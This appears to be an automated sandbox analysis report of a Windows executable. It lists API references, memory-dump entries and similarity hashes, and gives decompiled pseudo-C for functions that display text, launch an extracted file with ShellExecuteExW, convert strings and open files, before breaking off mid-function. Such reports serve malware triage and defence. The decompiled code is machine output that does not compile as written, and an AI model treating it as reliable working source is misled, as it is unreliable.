    0x0083d3f3
    0x0083d353
    0x0083d357
    0x00000000
    0x00000000
    0x00000000
    0x0083d3fb
    0x0083d3fb
    0x0083d3fb
    0x0083d404
    0x0083d407
    0x00000000
    0x0083d303
    0x0083d304
    0x00000000
    0x0083d309
    0x0083d301
    0x0083d28e
    0x0083d290
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0083d0c9
    0x0083d0c9
    0x0083d0cc
    0x0083d0d5
    0x0083d0da
    0x0083d0db
    0x0083d0db
    0x0083d0e3
    0x00000000
    0x0083d0e3

    APIs
    • __EH_prolog.LIBCMT ref: 0083D022
    • _wcschr.LIBVCRUNTIME ref: 0083D043
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0083D05E
    • __fprintf_l.LIBCMT ref: 0083D544
      • Part of subcall function 00841006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0083B3AF,00000000,?,?,?,0004022A), ref: 00841022
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
    • API String ID: 4184910265-4124877899
    • Opcode ID: 894bfd718a0f5f2bfd4f51305e552ddb9ba7228b0680e469d63b9099452acdf0
    • Instruction ID: 99da451b602eaa1864100f0c69dbdbb5082b753310de0073015d87fbbe2989c6
    • Opcode Fuzzy Hash: 894bfd718a0f5f2bfd4f51305e552ddb9ba7228b0680e469d63b9099452acdf0
    • Instruction Fuzzy Hash: 9D12037160030D9BDF24EFA8EC42AAD37A9FF90304F100169F91AD7291EB71E985CB95
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0084C1EB(intOrPtr _a4, long _a8) {
    				char _v67;
    				intOrPtr _v72;
    				signed int _v84;
    				int _v88;
    				void* _v92;
    				intOrPtr _t39;
    				intOrPtr _t42;
    				struct HWND__* _t44;
    				char _t47;
    
    				_t44 = GetDlgItem( *0x8775e8, 0x68);
    				_t47 =  *0x8775f3; // 0x1
    				if(_t47 == 0) {
    					_t42 =  *0x8775dc; // 0x0
    					E008485DC(_t42);
    					ShowWindow(_t44, 5); // executed
    					SendMessageW(_t44, 0xb1, 0, 0xffffffff);
    					SendMessageW(_t44, 0xc2, 0, 0x8622e4);
    					 *0x8775f3 = 1;
    				}
    				SendMessageW(_t44, 0xb1, 0x5f5e100, 0x5f5e100);
    				_v92 = 0x5c;
    				SendMessageW(_t44, 0x43a, 0,  &_v92);
    				_v67 = 0;
    				_t39 = _a4;
    				_v88 = 1;
    				if(_t39 != 0) {
    					_v72 = 0xa0;
    					_v88 = 0x40000001;
    					_v84 = _v84 & 0xbfffffff | 1;
    				}
    				SendMessageW(_t44, 0x444, 1,  &_v92);
    				SendMessageW(_t44, 0xc2, 0, _a8);
    				SendMessageW(_t44, 0xb1, 0x5f5e100, 0x5f5e100);
    				if(_t39 != 0) {
    					_v84 = _v84 & 0xfffffffe | 0x40000000;
    					SendMessageW(_t44, 0x444, 1,  &_v92);
    				}
    				return SendMessageW(_t44, 0xc2, 0, L"\r\n");
    			}












    0x0084c208
    0x0084c20f
    0x0084c215
    0x0084c217
    0x0084c21d
    0x0084c225
    0x0084c234
    0x0084c23e
    0x0084c240
    0x0084c240
    0x0084c254
    0x0084c25a
    0x0084c26a
    0x0084c26e
    0x0084c272
    0x0084c277
    0x0084c27d
    0x0084c288
    0x0084c292
    0x0084c29a
    0x0084c29a
    0x0084c2aa
    0x0084c2b4
    0x0084c2c3
    0x0084c2c7
    0x0084c2d5
    0x0084c2e6
    0x0084c2e6
    0x0084c2fa

    APIs
    • GetDlgItem.USER32(00000068,0088DE38), ref: 0084C1FA
    • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00849E02), ref: 0084C225
    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0084C234
    • SendMessageW.USER32(00000000,000000C2,00000000,008622E4), ref: 0084C23E
    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0084C254
    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0084C26A
    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0084C2AA
    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0084C2B4
    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0084C2C3
    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0084C2E6
    • SendMessageW.USER32(00000000,000000C2,00000000,0086304C), ref: 0084C2F1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: MessageSend$ItemShowWindow
    • String ID: \
    • API String ID: 1207805008-2967466578
    • Opcode ID: ff7bc03ce593fdbda8098b9099c1163f47ad2bc1d82a1e7c65f8ea0af7546824
    • Instruction ID: 3f6f033f43f6c2cab1a1469a4996ff18ecf26f286e643f655ba4ca0e823b1485
    • Opcode Fuzzy Hash: ff7bc03ce593fdbda8098b9099c1163f47ad2bc1d82a1e7c65f8ea0af7546824
    • Instruction Fuzzy Hash: E921E4712457487BE311EB249C45FAB7E9CFF82714F010619F690D61D1CBA59A08CAAB
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 48%
    			E0084C487(struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, int _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, signed short* _a4168, intOrPtr _a4172) {
    				signed short _v0;
    				long _v12;
    				void* __edi;
    				int _t54;
    				signed int _t57;
    				signed short* _t58;
    				long _t68;
    				int _t77;
    				signed int _t80;
    				signed short* _t81;
    				signed short _t82;
    				intOrPtr _t84;
    				long _t86;
    				signed short* _t87;
    				struct HWND__* _t89;
    				signed short* _t91;
    				void* _t93;
    				void* _t95;
    				void* _t99;
    
    				_t54 = 0x1040;
    				E0084D9C0();
    				_t91 = _a4168;
    				_t77 = 0;
    				if( *_t91 == 0) {
    					L55:
    					return _t54;
    				}
    				_t54 = E00852B93(_t91);
    				if(0x1040 >= 0x7f6) {
    					goto L55;
    				} else {
    					_t86 = 0x3c;
    					E0084E920(_t86,  &_a4, 0, _t86);
    					_t84 = _a4172;
    					_t99 = _t99 + 0xc;
    					_a4.cbSize = _t86;
    					_a8 = 0x1c0;
    					if(_t84 != 0) {
    						_a8 = 0x5c0;
    					}
    					_t80 =  *_t91 & 0x0000ffff;
    					_t87 =  &(_t91[1]);
    					_t95 = 0x22;
    					if(_t80 != _t95) {
    						_t87 = _t91;
    					}
    					_a20 = _t87;
    					_t57 = _t77;
    					if(_t80 == 0) {
    						L13:
    						_t58 = _a24;
    						L14:
    						if(_t58 == 0 ||  *_t58 == _t77) {
    							if(_t84 == 0 &&  *0x87a602 != _t77) {
    								_a24 = 0x87a602;
    							}
    						}
    						_a32 = 1;
    						_t93 = E0083B1F0(_t87);
    						if(_t93 != 0 && E00841438(_t93, L".inf") == 0) {
    							_a16 = L"Install";
    						}
    						if(E00839F0F(_a20) != 0) {
    							_push(0x800);
    							_push( &_a64);
    							_push(_a20);
    							E0083AF74();
    							_a8 =  &_a52;
    						}
    						_t54 = ShellExecuteExW( &_a4); // executed
    						if(_t54 != 0) {
    							_t89 = _a4160;
    							if( *0x8785f8 != _t77 || _a4168 != _t77 ||  *0x88de21 != _t77) {
    								if(_t89 != 0) {
    									_push(_t89);
    									if( *0x86df24() != 0) {
    										ShowWindow(_t89, _t77);
    										_t77 = 1;
    									}
    								}
    								 *0x86df20(_a56, 0x7d0);
    								E0084C946(_a48);
    								if( *0x88de21 != 0 && _a4160 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
    									_t68 = _v12;
    									if(_t68 >  *0x88de24) {
    										 *0x88de24 = _t68;
    									}
    									 *0x88de22 = 1;
    								}
    							}
    							CloseHandle(_a48);
    							if(_t93 == 0 || E00841438(_t93, L".exe") != 0) {
    								_t54 = _a4160;
    								if( *0x8785f8 != 0 && _t54 == 0 &&  *0x88de21 == _t54) {
    									 *0x88de28 = 0x1b58;
    								}
    							} else {
    								_t54 = _a4160;
    							}
    							if(_t77 != 0 && _t54 != 0) {
    								_t54 = ShowWindow(_t89, 1);
    							}
    						}
    						goto L55;
    					}
    					_t81 = _t91;
    					_v0 = 0x20;
    					do {
    						if( *_t81 == _t95) {
    							while(1) {
    								_t57 = _t57 + 1;
    								if(_t91[_t57] == _t77) {
    									break;
    								}
    								if(_t91[_t57] == _t95) {
    									_t82 = _v0;
    									_t91[_t57] = _t82;
    									L10:
    									if(_t91[_t57] == _t82 ||  *((short*)(_t91 + 2 + _t57 * 2)) == 0x2f) {
    										if(_t91[_t57] == _v0) {
    											_t91[_t57] = 0;
    										}
    										_t58 =  &(_t91[_t57 + 1]);
    										_a24 = _t58;
    										goto L14;
    									} else {
    										goto L12;
    									}
    								}
    							}
    						}
    						_t82 = _v0;
    						goto L10;
    						L12:
    						_t57 = _t57 + 1;
    						_t81 =  &(_t91[_t57]);
    					} while ( *_t81 != _t77);
    					goto L13;
    				}
    			}






















    0x0084c487
    0x0084c48c
    0x0084c493
    0x0084c49a
    0x0084c49f
    0x0084c6eb
    0x0084c6f3
    0x0084c6f3
    0x0084c4a6
    0x0084c4b1
    0x00000000
    0x0084c4b7
    0x0084c4ba
    0x0084c4c2
    0x0084c4c7
    0x0084c4ce
    0x0084c4d1
    0x0084c4d5
    0x0084c4df
    0x0084c4e1
    0x0084c4e1
    0x0084c4e9
    0x0084c4ec
    0x0084c4f2
    0x0084c4f6
    0x0084c4f8
    0x0084c4f8
    0x0084c4fa
    0x0084c4fe
    0x0084c503
    0x0084c53b
    0x0084c53b
    0x0084c53f
    0x0084c541
    0x0084c54a
    0x0084c555
    0x0084c555
    0x0084c54a
    0x0084c55e
    0x0084c56b
    0x0084c56f
    0x0084c580
    0x0084c580
    0x0084c593
    0x0084c595
    0x0084c59e
    0x0084c59f
    0x0084c5a3
    0x0084c5ac
    0x0084c5ac
    0x0084c5b5
    0x0084c5bd
    0x0084c5c3
    0x0084c5d6
    0x0084c5eb
    0x0084c5ed
    0x0084c5f6
    0x0084c5fa
    0x0084c5fc
    0x0084c5fc
    0x0084c5f6
    0x0084c607
    0x0084c611
    0x0084c61d
    0x0084c63c
    0x0084c646
    0x0084c648
    0x0084c648
    0x0084c64d
    0x0084c64d
    0x0084c61d
    0x0084c658
    0x0084c660
    0x0084c678
    0x0084c67f
    0x0084c68d
    0x0084c68d
    0x0084c6d5
    0x0084c6d5
    0x0084c6d5
    0x0084c6de
    0x0084c6e7
    0x0084c6e7
    0x0084c6de
    0x00000000
    0x0084c6ea
    0x0084c505
    0x0084c507
    0x0084c50f
    0x0084c512
    0x0084c69f
    0x0084c69f
    0x0084c6a4
    0x00000000
    0x00000000
    0x0084c69d
    0x0084c6ab
    0x0084c6af
    0x0084c51c
    0x0084c520
    0x0084c6c0
    0x0084c6c4
    0x0084c6c4
    0x0084c6c9
    0x0084c6cc
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0084c520
    0x0084c69d
    0x0084c6a6
    0x0084c518
    0x00000000
    0x0084c532
    0x0084c532
    0x0084c533
    0x0084c536
    0x00000000
    0x0084c50f

    APIs
    • ShellExecuteExW.SHELL32(000001C0), ref: 0084C5B5
    • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 0084C5FA
    • GetExitCodeProcess.KERNEL32 ref: 0084C632
    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0084C658
    • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 0084C6E7
      • Part of subcall function 00841438: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0083ADA2,?,?,?,0083AD51,?,-00000002,?,00000000,?), ref: 0084144E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
    • String ID: $.exe$.inf
    • API String ID: 3686203788-2452507128
    • Opcode ID: a0654ad77c89041f798b6bcdef0045aaea96774f57cf5bd4bad4eb1dc123290d
    • Instruction ID: 30cdaf77ca9127bfc5e61b22953425d9faab81fa3083fbe273efecccb3fdd8fd
    • Opcode Fuzzy Hash: a0654ad77c89041f798b6bcdef0045aaea96774f57cf5bd4bad4eb1dc123290d
    • Instruction Fuzzy Hash: 6B5102705063889BDB71AF24D940AABBBEDFFA5304F05580DE4C1D7190DBB19988CB56
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 71%
    			E00859600(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
    				signed int _v8;
    				int _v12;
    				void* _v24;
    				signed int _t49;
    				signed int _t54;
    				int _t58;
    				signed int _t60;
    				short* _t62;
    				signed int _t66;
    				short* _t70;
    				int _t71;
    				int _t78;
    				short* _t81;
    				signed int _t87;
    				signed int _t90;
    				void* _t95;
    				void* _t96;
    				int _t98;
    				short* _t101;
    				int _t103;
    				signed int _t106;
    				short* _t107;
    				void* _t110;
    
    				_push(__ecx);
    				_push(__ecx);
    				_t49 =  *0x86d668; // 0x14325215
    				_v8 = _t49 ^ _t106;
    				_push(__esi);
    				_t103 = _a20;
    				if(_t103 > 0) {
    					_t78 = E0085DC0C(_a16, _t103);
    					_t110 = _t78 - _t103;
    					_t4 = _t78 + 1; // 0x1
    					_t103 = _t4;
    					if(_t110 >= 0) {
    						_t103 = _t78;
    					}
    				}
    				_t98 = _a32;
    				if(_t98 == 0) {
    					_t98 =  *( *_a4 + 8);
    					_a32 = _t98;
    				}
    				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
    				_v12 = _t54;
    				if(_t54 == 0) {
    					L38:
    					return E0084E243(_v8 ^ _t106);
    				} else {
    					_t95 = _t54 + _t54;
    					_t85 = _t95 + 8;
    					asm("sbb eax, eax");
    					if((_t95 + 0x00000008 & _t54) == 0) {
    						_t81 = 0;
    						__eflags = 0;
    						L14:
    						if(_t81 == 0) {
    							L36:
    							_t105 = 0;
    							L37:
    							E00859868(_t81);
    							goto L38;
    						}
    						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
    						_t121 = _t58;
    						if(_t58 == 0) {
    							goto L36;
    						}
    						_t100 = _v12;
    						_t60 = E00859CBF(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
    						_t105 = _t60;
    						if(_t105 == 0) {
    							goto L36;
    						}
    						if((_a12 & 0x00000400) == 0) {
    							_t96 = _t105 + _t105;
    							_t87 = _t96 + 8;
    							__eflags = _t96 - _t87;
    							asm("sbb eax, eax");
    							__eflags = _t87 & _t60;
    							if((_t87 & _t60) == 0) {
    								_t101 = 0;
    								__eflags = 0;
    								L30:
    								__eflags = _t101;
    								if(__eflags == 0) {
    									L35:
    									E00859868(_t101);
    									goto L36;
    								}
    								_t62 = E00859CBF(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
    								__eflags = _t62;
    								if(_t62 == 0) {
    									goto L35;
    								}
    								_push(0);
    								_push(0);
    								__eflags = _a28;
    								if(_a28 != 0) {
    									_push(_a28);
    									_push(_a24);
    								} else {
    									_push(0);
    									_push(0);
    								}
    								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
    								__eflags = _t105;
    								if(_t105 != 0) {
    									E00859868(_t101);
    									goto L37;
    								} else {
    									goto L35;
    								}
    							}
    							_t90 = _t96 + 8;
    							__eflags = _t96 - _t90;
    							asm("sbb eax, eax");
    							_t66 = _t60 & _t90;
    							_t87 = _t96 + 8;
    							__eflags = _t66 - 0x400;
    							if(_t66 > 0x400) {
    								__eflags = _t96 - _t87;
    								asm("sbb eax, eax");
    								_t101 = E00857B00(_t87, _t66 & _t87);
    								_pop(_t87);
    								__eflags = _t101;
    								if(_t101 == 0) {
    									goto L35;
    								}
    								 *_t101 = 0xdddd;
    								L28:
    								_t101 =  &(_t101[4]);
    								goto L30;
    							}
    							__eflags = _t96 - _t87;
    							asm("sbb eax, eax");
    							E00860F30();
    							_t101 = _t107;
    							__eflags = _t101;
    							if(_t101 == 0) {
    								goto L35;
    							}
    							 *_t101 = 0xcccc;
    							goto L28;
    						}
    						_t70 = _a28;
    						if(_t70 == 0) {
    							goto L37;
    						}
    						_t125 = _t105 - _t70;
    						if(_t105 > _t70) {
    							goto L36;
    						}
    						_t71 = E00859CBF(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
    						_t105 = _t71;
    						if(_t71 != 0) {
    							goto L37;
    						}
    						goto L36;
    					}
    					asm("sbb eax, eax");
    					_t72 = _t54 & _t95 + 0x00000008;
    					_t85 = _t95 + 8;
    					if((_t54 & _t95 + 0x00000008) > 0x400) {
    						__eflags = _t95 - _t85;
    						asm("sbb eax, eax");
    						_t81 = E00857B00(_t85, _t72 & _t85);
    						_pop(_t85);
    						__eflags = _t81;
    						if(__eflags == 0) {
    							goto L36;
    						}
    						 *_t81 = 0xdddd;
    						L12:
    						_t81 =  &(_t81[4]);
    						goto L14;
    					}
    					asm("sbb eax, eax");
    					E00860F30();
    					_t81 = _t107;
    					if(_t81 == 0) {
    						goto L36;
    					}
    					 *_t81 = 0xcccc;
    					goto L12;
    				}
    			}


























    0x00859605
    0x00859606
    0x00859607
    0x0085960e
    0x00859612
    0x00859613
    0x00859619
    0x0085961f
    0x00859625
    0x00859628
    0x00859628
    0x0085962b
    0x0085962d
    0x0085962d
    0x0085962b
    0x0085962f
    0x00859634
    0x0085963b
    0x0085963e
    0x0085963e
    0x0085965a
    0x00859660
    0x00859665
    0x008597f8
    0x0085980b
    0x0085966b
    0x0085966b
    0x0085966e
    0x00859673
    0x00859677
    0x008596cb
    0x008596cb
    0x008596cd
    0x008596cf
    0x008597ed
    0x008597ed
    0x008597ef
    0x008597f0
    0x00000000
    0x008597f6
    0x008596e0
    0x008596e6
    0x008596e8
    0x00000000
    0x00000000
    0x008596ee
    0x00859700
    0x00859705
    0x00859709
    0x00000000
    0x00000000
    0x00859716
    0x00859750
    0x00859753
    0x00859756
    0x00859758
    0x0085975a
    0x0085975c
    0x008597a8
    0x008597a8
    0x008597aa
    0x008597aa
    0x008597ac
    0x008597e6
    0x008597e7
    0x00000000
    0x008597ec
    0x008597c0
    0x008597c5
    0x008597c7
    0x00000000
    0x00000000
    0x008597cb
    0x008597cc
    0x008597cd
    0x008597d0
    0x0085980c
    0x0085980f
    0x008597d2
    0x008597d2
    0x008597d3
    0x008597d3
    0x008597e0
    0x008597e2
    0x008597e4
    0x00859815
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x008597e4
    0x0085975e
    0x00859761
    0x00859763
    0x00859765
    0x00859767
    0x0085976a
    0x0085976f
    0x0085978a
    0x0085978c
    0x00859796
    0x00859798
    0x00859799
    0x0085979b
    0x00000000
    0x00000000
    0x0085979d
    0x008597a3
    0x008597a3
    0x00000000
    0x008597a3
    0x00859771
    0x00859773
    0x00859777
    0x0085977c
    0x0085977e
    0x00859780
    0x00000000
    0x00000000
    0x00859782
    0x00000000
    0x00859782
    0x00859718
    0x0085971d
    0x00000000
    0x00000000
    0x00859723
    0x00859725
    0x00000000
    0x00000000
    0x0085973c
    0x00859741
    0x00859745
    0x00000000
    0x00000000
    0x00000000
    0x0085974b
    0x0085967e
    0x00859680
    0x00859682
    0x0085968a
    0x008596a9
    0x008596ab
    0x008596b5
    0x008596b7
    0x008596b8
    0x008596ba
    0x00000000
    0x00000000
    0x008596c0
    0x008596c6
    0x008596c6
    0x00000000
    0x008596c6
    0x0085968e
    0x00859692
    0x00859697
    0x0085969b
    0x00000000
    0x00000000
    0x008596a1
    0x00000000
    0x008596a1

    APIs
    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0085457B,0085457B,?,?,?,00859851,00000001,00000001,47E85006), ref: 0085965A
    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00859851,00000001,00000001,47E85006,?,?,?), ref: 008596E0
    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,47E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008597DA
    • __freea.LIBCMT ref: 008597E7
      • Part of subcall function 00857B00: RtlAllocateHeap.NTDLL(00000000,?,?,?,00853006,?,0000015D,?,?,?,?,008544E2,000000FF,00000000,?,?), ref: 00857B32
    • __freea.LIBCMT ref: 008597F0
    • __freea.LIBCMT ref: 00859815
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ByteCharMultiWide__freea$AllocateHeap
    • String ID:
    • API String ID: 1414292761-0
    • Opcode ID: a47d4700eceda4066532dbf719cd5f4969d521200f09c8acfe3e268b0bf4abfe
    • Instruction ID: a5dcf5464da58407ab92a75c8342e8e70e8a53ac200e3b0bd37cc62064d81051
    • Opcode Fuzzy Hash: a47d4700eceda4066532dbf719cd5f4969d521200f09c8acfe3e268b0bf4abfe
    • Instruction Fuzzy Hash: 6851F272620206EFDB258F78CC81EBB77AAFB48751F15422AFC44D6180EB34DC48C6A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E0083980C(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
    				long _v0;
    				void* _t48;
    				long _t59;
    				unsigned int _t61;
    				long _t64;
    				signed int _t65;
    				char _t68;
    				void* _t72;
    				void* _t74;
    				long _t78;
    				void* _t81;
    
    				_t74 = __esi;
    				E0084D9C0();
    				_t61 = _a4188;
    				_t72 = __ecx;
    				 *(__ecx + 0x1020) =  *(__ecx + 0x1020) & 0x00000000;
    				if( *((char*)(__ecx + 0x1d)) != 0 || (_t61 & 0x00000004) != 0) {
    					_t68 = 1;
    				} else {
    					_t68 = 0;
    				}
    				_push(_t74);
    				asm("sbb esi, esi");
    				_t78 = ( ~(_t61 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
    				if((_t61 & 0x00000001) != 0) {
    					_t78 = _t78 | 0x40000000;
    				}
    				_t64 =  !(_t61 >> 3) & 0x00000001;
    				if(_t68 != 0) {
    					_t64 = _t64 | 0x00000002;
    				}
    				_v0 = (0 |  *((intOrPtr*)(_t72 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
    				E00836FEC( &_a12);
    				if( *((char*)(_t72 + 0x1c)) != 0) {
    					_t78 = _t78 | 0x00000100;
    				}
    				_t48 = CreateFileW(_a4184, _t78, _t64, 0, 3, _v0, 0); // executed
    				_t81 = _t48;
    				if(_t81 != 0xffffffff) {
    					L17:
    					if( *((char*)(_t72 + 0x1c)) != 0 && _t81 != 0xffffffff) {
    						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
    						_a8 = _a8 | 0xffffffff;
    						SetFileTime(_t81, 0,  &_a4, 0);
    					}
    					 *((char*)(_t72 + 0x12)) = 0;
    					_t65 = _t64 & 0xffffff00 | _t81 != 0xffffffff;
    					 *((intOrPtr*)(_t72 + 0xc)) = 0;
    					 *((char*)(_t72 + 0x10)) = 0;
    					if(_t81 != 0xffffffff) {
    						 *(_t72 + 4) = _t81;
    						E0083FAE7(_t72 + 0x1e, _a4184, 0x800);
    					}
    					return _t65;
    				} else {
    					_a4.dwLowDateTime = GetLastError();
    					if(E0083B3C9(_a4184,  &_a12, 0x800) == 0) {
    						L15:
    						if(_a4.dwLowDateTime == 2) {
    							 *((intOrPtr*)(_t72 + 0x1020)) = 1;
    						}
    						goto L17;
    					}
    					_t81 = CreateFileW( &_a12, _t78, _t64, 0, 3, _v0, 0);
    					_t59 = GetLastError();
    					if(_t59 == 2) {
    						_a4.dwLowDateTime = _t59;
    					}
    					if(_t81 != 0xffffffff) {
    						goto L17;
    					} else {
    						goto L15;
    					}
    				}
    			}














    0x0083980c
    0x00839811
    0x00839817
    0x00839820
    0x00839822
    0x0083982d
    0x00839838
    0x00839834
    0x00839834
    0x00839834
    0x0083983e
    0x00839846
    0x0083984e
    0x00839857
    0x00839859
    0x00839859
    0x00839864
    0x00839869
    0x0083986b
    0x0083986b
    0x00839880
    0x00839884
    0x0083988d
    0x0083988f
    0x0083988f
    0x008398a8
    0x008398ae
    0x008398b3
    0x00839917
    0x0083991c
    0x00839923
    0x0083992c
    0x00839937
    0x00839937
    0x00839942
    0x00839945
    0x00839948
    0x0083994b
    0x00839951
    0x00839962
    0x00839966
    0x00839966
    0x00839976
    0x008398b5
    0x008398bb
    0x008398d7
    0x00839906
    0x0083990b
    0x0083990d
    0x0083990d
    0x00000000
    0x0083990b
    0x008398f0
    0x008398f2
    0x008398fb
    0x008398fd
    0x008398fd
    0x00839904
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00839904

    APIs
    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,008377E5,?,00000005,?,00000011), ref: 008398A8
    • GetLastError.KERNEL32(?,?,008377E5,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008398B5
    • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,008377E5,?,00000005,?), ref: 008398EA
    • GetLastError.KERNEL32(?,?,008377E5,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008398F2
    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,008377E5,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00839937
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: File$CreateErrorLast$Time
    • String ID:
    • API String ID: 1999340476-0
    • Opcode ID: 1fbbf7e5571da572f5e67a4a5032f71852da0dc2a55a670024b64003a261d66c
    • Instruction ID: 81c6c986d22075aa51ce2b1f7276ce0fb74297fc5cf8a3b52544a50d9fd43935
    • Opcode Fuzzy Hash: 1fbbf7e5571da572f5e67a4a5032f71852da0dc2a55a670024b64003a261d66c
    • Instruction Fuzzy Hash: 41413831844B566BE7209F248C05BDABBE4FB81324F100719F9E4D61D0D3F5A998CBD2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E0085A70D(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
    				char _v8;
    				char _v16;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				char _t31;
    				signed int _t36;
    				char _t40;
    				intOrPtr _t44;
    				char _t45;
    				signed int _t51;
    				void* _t64;
    				void* _t70;
